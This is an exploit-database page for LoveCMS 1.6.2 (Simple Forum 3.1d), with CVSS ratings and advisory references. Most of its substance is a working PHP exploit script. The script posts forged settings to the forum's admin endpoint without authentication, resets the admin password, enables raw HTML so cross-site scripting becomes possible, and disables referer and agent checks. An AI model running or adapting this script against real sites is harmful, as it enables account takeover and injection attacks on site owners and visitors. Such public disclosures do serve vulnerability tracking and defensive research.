LoveCMS 1.6.2 Final (Simple Forum 3.1d) Change Admin Password Exploit

2008-12-03 / 2008-12-04
Credit: cOndemned
Risk: High
Local: No
Remote: Yes
CWE: CWE-264


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

<?php /** * LoveCMS 1.6.2 Final (Simple Forum 3.1d) Change Admin Password Exploit * Vulnerability found & exploited by cOndemned * * Download: * http://www.thethinkingman.net/modules/download_manager/?id=4 * * Description: * This exploit changes forum admin password (ex. attacker will be * able to delete threads/topics) and sets allowHTML to true * (attacks such as XSS/HTML Injection will be possible) * */ $target = 'localhost/audits/lovecms'; $pass = 'timetodie'; $buff = array ( 'language' => 'en', 'forumWidth' => '500', 'forumAlign' => 'left', 'forumTitle' => 'Simple Forum', 'threadsPerPage' => '15', 'wordLength' => '50', 'autoDelete' => '12', 'adminPass' => $pass, 'allowHTML' => '1', 'allowURLs' => '1', 'allowUBBs' => '1', 'enableIDs' => '0', 'enableSignature' => '1', 'enableRefererCheck' => '0', 'enableAgentCheck' => '0', 'agents' => 'Mozilla.Opera.Lynx.Mosaic.amaya.WebExplorer.IBrowse.iCab', 'nonos' => 'fuck.asshole', 'update' => 'Update' ); $xpl = curl_init(); curl_setopt($xpl, CURLOPT_URL, $target . '/modules/simpleforum/admin/index.php'); curl_setopt($xpl, CURLOPT_POST, 1); curl_setopt($xpl, CURLOPT_POSTFIELDS, $buff); curl_exec($xpl); curl_close($xpl); echo "[!] Go to the website and check if U can login.\r\n"; ?>

References:

http://xforce.iss.net/xforce/xfdb/46793
http://www.securityfocus.com/bid/32435
http://www.milw0rm.com/exploits/7191
http://www.frsirt.com/english/advisories/2008/3243
http://secunia.com/advisories/32758
http://osvdb.org/50067


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top